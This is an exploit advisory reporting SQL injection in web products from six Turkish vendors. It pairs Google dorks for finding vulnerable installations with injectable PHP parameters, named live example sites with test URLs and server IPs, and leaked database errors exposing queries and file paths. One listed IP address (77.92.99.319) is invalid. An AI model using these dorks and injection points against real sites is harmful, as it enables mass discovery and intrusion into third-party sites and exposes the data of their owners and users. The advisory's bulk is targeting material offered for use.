####################################################################
# Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/01/2019
# Vendor Homepages of 6 Products :
1) devsoft.com.tr
2) btmbilisim.com ~ btmarge.com
3) algoritma.com.tr
4) mplusnet.com
5) webicerik.com
6) verisay.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################
# There are 6 vendors whose products suffer from remote SQL Injection vulnerabilities.
***************************************************************************
1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr
2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com
3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr
4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com
5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com
6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com
####################################################################
# Google Dorks for the Different Vulnerable Products :
********************************************
1) intext:''Web Yazılım: Devsoft''
2) intext:''Tüm hakları saklıdır. BTM ARGE.''
3) intext:''www.algoritma.com.tr"
4) intext:''Powered By M.Ceylan'' site:tr
5) intext:Webİcerik Kurumsal
6) intext:Verisay Web Tasarım
####################################################################
1) Web Yazılım Devsoft SQL Injection Vulnerability
********************************************
# Google Dork :
****************
intext:''Web Yazılım: Devsoft''
# SQL Injection Exploit :
**********************
/urunler.php?id=[SQL Injection]
/page.php?id=[SQL Injection]
/haber.php?id=[SQL Injection]
# Example Vulnerable Site :
************************
[+] adabroker.com.tr/urunler.php?id=90%27
Note : (94.73.151.155) => There are 338 domains hosted on this server.
Note : (159.69.91.216) => There are 44 domains hosted on this server.
# SQL Database Error :
*********************
HATA : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
####################################################################
2) BTMArgeBilişim SQL Injection Vulnerability
****************************************
# Google Dork :
****************
intext:''Tüm hakları saklıdır. BTM ARGE.''
# SQL Injection Exploit :
**********************
/urun_detay.php?ID=[SQL Injection]
# Example Vulnerable Site :
************************
[+] habibmetal.com/urun_detay.php?ID=1'
Note : (213.128.66.82) => There are 543 domains hosted on this server.
Note : (35.243.133.12) => There are 2 domains hosted on this server.
# SQL Database Error :
**********************
Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12
####################################################################
3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
**********************************************************
# Google Dork :
****************
intext:''www.algoritma.com.tr"
# SQL Injection Exploit :
**********************
/urun.php?id=[SQL Injection]
/urunler.php?id=[SQL Injection]
# Example Vulnerable Site :
************************
[+] ozgordal.com.tr/urun.php?id=15%27
Note : (94.73.146.96) => There are 220 domains hosted on this server.
Note : (93.187.206.206) => There are 693 domains hosted on this server.
# SQL Database Error :
**********************
select * from yenilikler where id=15'
select * from kategoriler where id=6'
####################################################################
4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
**************************************************
# Google Dork :
****************
intext:''Powered By M.Ceylan'' site:tr
# SQL Injection Exploit :
**********************
/match.php?id_match=[SQL Injection]
/lig/consult/istatistik.php?equipe=[SQL Injection]
# Example Vulnerable Site :
************************
[+] alanyaspor.org.tr/match.php?id_match=871%27
Note : (31.169.73.251) => There is 1 domain hosted on this server.
Note : (31.169.73.242) => There are 58 domains hosted on this server.
# SQL Database Error :
**********************
Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/alanyaspor/public_html/match.php on line 62
####################################################################
5) Webİcerik SQL Injection Vulnerability
************************************
# Google Dork :
****************
intext:Webİcerik Kurumsal
# SQL Injection Exploit :
**********************
/index.php?page=mod_video_goster&videoID=[SQL Injection]
/ENG/index.php?page=icerikgoster&menuID=[SQL Injection]
# Example Vulnerable Site :
************************
tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27
Note : (77.92.99.319) => 1 Domain.
Note : (77.92.99.31) => There are 13 domains hosted on this server.
# SQL Database Error :
**********************
Warning: mysql_fetch_assoc(): supplied argument is not a valid
MySQL result resource in /var/www/vhosts/tcma.org.tr
/tcma.org.tr/ENG/lib/emit_icerik.php on line 323
####################################################################
6) Verisay Web Tasarım SQL Injection Vulnerability
*********************************************
# Google Dork :
****************
intext:Verisay Web Tasarım
# SQL Injection Exploit :
**********************
/urunler/urun_detay.php?id=[SQL Injection]
# Example Vulnerable Site :
************************
[+] irena.com.tr/urunler/urun_detay.php?id=1465%27
Note : (89.19.29.4) => There are 130 domains hosted on this server.
Note : (52.19.74.107) => There are 10 domains hosted on this server.
# SQL Database Error :
**********************
SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15
SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################